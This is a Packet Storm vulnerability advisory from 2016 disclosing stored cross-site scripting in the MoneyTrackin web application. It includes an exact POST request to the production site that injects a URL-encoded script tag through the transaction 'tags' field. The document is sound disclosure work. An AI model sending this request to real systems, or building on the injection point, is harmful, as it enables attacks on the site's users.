MoneyTrackin Web Application Cross Site Scripting

2016-06-25T00:00:00
ID PACKETSTORM:137643
Type packetstorm
Reporter Brett DeWall
Modified 2016-06-25T00:00:00

Description

                                        
                                            `# Exploit Title: MoneyTrackin Web Application - Stored Cross-Site Scripting (XSS)  
# Date: 6/24/16  
# Exploit Author: Brett DeWall  
# Exploit Author Twitter: @xbadbiddyx   
# Exploit Author Blog: http://xbadbiddyx.tumblr.com  
# Vendor Homepage: https://www.moneytrackin.com/  
# Version: Latest commit  
# Contacted Vendor Date: 6/18/16  
  
  
### Vulnerable Request  
Request  
POST /accounting/create_transaction/?project=NULL HTTP/1.1  
Host: www.moneytrackin.com  
  
  
project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sent=1&clientDate=2016-06-17&oldproject=NULL  
`